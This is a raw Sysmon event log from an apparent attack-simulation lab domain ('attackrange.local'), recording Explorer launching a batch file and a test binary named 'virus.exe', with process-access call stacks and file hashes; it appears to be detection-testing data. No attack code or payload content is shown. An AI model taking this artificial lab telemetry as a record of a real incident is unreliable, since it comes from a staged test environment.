07:57:17.096{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.096{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.096{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.096{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.081{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.049{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.049{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.049{466BC892-F5DD-60EB-757D-00000000CF01}969210124C:\Windows\system32\conhost.exe{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.033{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.012{466BC892-02AF-60E8-1400-00000000CF01}10285432C:\Windows\System32\svchost.exe{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.012{466BC892-02AF-60E8-1400-00000000CF01}10285432C:\Windows\System32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.012{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.012{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.012{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.012{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.012{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.012{466BC892-32D3-60E8-770B-00000000CF01}635610048C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+18cf7c|C:\Windows\System32\SHELL32.dll+18ccd3|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:16.961{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" "C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001050959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:18.465{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56E5BD55DA54911BA3EE1B285808B301,SHA256=B943DAAE69A0A45A10E66DA71B01A0BC95E063465F48BAB580CA329F888EF2ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808441Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:18.056{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8D0D54587B4B3A4291DD56C0DF281C2,SHA256=0B06F6F92406AB3EB6CC228AD43B48770623B57D8C4D178036F79363102315DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:18.349{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.802{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=049881D97DB9CF782F39B01BF42573F3,SHA256=B668B645DE0F05137DBE09B29C7CC6AE08EF8846A697087561CA8E06CFC94A66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.787{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F92893837BF3A779E84802DA8970A28,SHA256=5D27F1E1C42D69E371D6D870BCA4E113EDCFBB427BB42E79B5DEC191A2B80A36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808442Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:19.072{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6714E65966AAD1F1A087BBAE99023CA7,SHA256=E2A2DFF300925B8B2C092EF5BA76614ADCBFE56D0DF97FD313CF5191B265C0B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.328{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\temp\test\virus.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.328{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\temp\test\virus.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.313{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5DF-60EB-7F7D-00000000CF01}7240C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.313{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5DF-60EB-7F7D-00000000CF01}7240C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.313{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\temp\test\virus.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.313{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\temp\test\virus.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.313{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\temp\test\virus.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.291{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5DF-60EB-7F7D-00000000CF01}7240C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.291{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5DF-60EB-7F7D-00000000CF01}7240C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.291{466BC892-F5DF-60EB-7F7D-00000000CF01}72407868C:\Windows\system32\conhost.exe{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\temp\test\virus.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-7F7D-00000000CF01}7240C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 